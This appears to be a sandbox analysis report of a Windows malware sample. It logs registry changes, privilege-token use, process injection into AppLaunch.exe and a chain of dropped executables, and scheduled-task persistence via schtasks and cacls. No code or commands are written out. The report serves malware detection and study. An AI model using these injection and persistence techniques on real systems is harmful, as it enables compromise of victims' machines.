Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\A463.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3820 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3232 wrote to memory of 4696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7A3C.exe
PID 3232 wrote to memory of 4696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7A3C.exe
PID 3232 wrote to memory of 4696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7A3C.exe
PID 3232 wrote to memory of 4884 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7B18.exe
PID 3232 wrote to memory of 4884 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7B18.exe
PID 3232 wrote to memory of 4884 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7B18.exe
PID 3232 wrote to memory of 1408 N/A C:\Windows\Explorer.EXE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3232 wrote to memory of 1408 N/A C:\Windows\Explorer.EXE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3232 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7CA0.exe
PID 3232 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7CA0.exe
PID 3232 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7CA0.exe
PID 3232 wrote to memory of 1616 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7D1E.exe
PID 3232 wrote to memory of 1616 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7D1E.exe
PID 3232 wrote to memory of 1616 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7D1E.exe
PID 3232 wrote to memory of 4856 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7DAC.exe
PID 3232 wrote to memory of 4856 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7DAC.exe
PID 3232 wrote to memory of 4856 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7DAC.exe
PID 4696 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\7A3C.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe
PID 4696 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\7A3C.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe
PID 4696 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\7A3C.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe
PID 3232 wrote to memory of 224 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EB7.exe
PID 3232 wrote to memory of 224 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EB7.exe
PID 3232 wrote to memory of 224 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EB7.exe
PID 1408 wrote to memory of 4288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3296 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe
PID 3296 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe
PID 3296 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe
PID 4964 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe
PID 4964 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe
PID 4964 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe
PID 4792 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe
PID 4792 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe
PID 4792 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe
PID 5040 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe
PID 5040 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe
PID 5040 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe
PID 4288 wrote to memory of 3264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4288 wrote to memory of 3264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\7DAC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4856 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\7DAC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4856 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\7DAC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3340 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3340 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3340 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1408 wrote to memory of 3424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4708 wrote to memory of 5080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4708 wrote to memory of 5080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe

"C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\7A3C.exe

C:\Users\Admin\AppData\Local\Temp\7A3C.exe

C:\Users\Admin\AppData\Local\Temp\7B18.exe
